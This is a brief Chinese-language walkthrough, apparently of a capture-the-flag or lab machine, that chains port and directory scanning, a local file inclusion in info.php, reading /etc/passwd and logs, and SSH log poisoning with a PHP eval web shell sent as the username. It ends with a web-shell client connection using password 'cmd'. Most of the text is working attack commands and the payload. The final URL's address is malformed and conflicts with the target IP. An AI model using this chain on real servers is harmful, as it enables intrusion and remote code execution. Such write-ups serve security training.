1.扫描端口
nmap -A -p- 172.16.1.113

2.敏感目录扫描
dirb http://172.16.1.113/

3.访问敏感目录
http://172.16.1.113/antibot_image/

4.在antibots目录下找到一个info.php文件

5.访问info.php
允许远程读取URL文件,但是不允许包含URL文件,可以进行利用

6.查看源码,提示可以传参,存在文件包含漏洞。

7.页面通过image传参查看passwd文件

8.页面通过image传参查看日志文件

该文件还记录了ssh登录的登录日志
9.将一句话木马作为ssh登录的用户名登录
ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211
将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

10.蚁剑连接
URL地址:http://192.168.192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log
密码:cmd

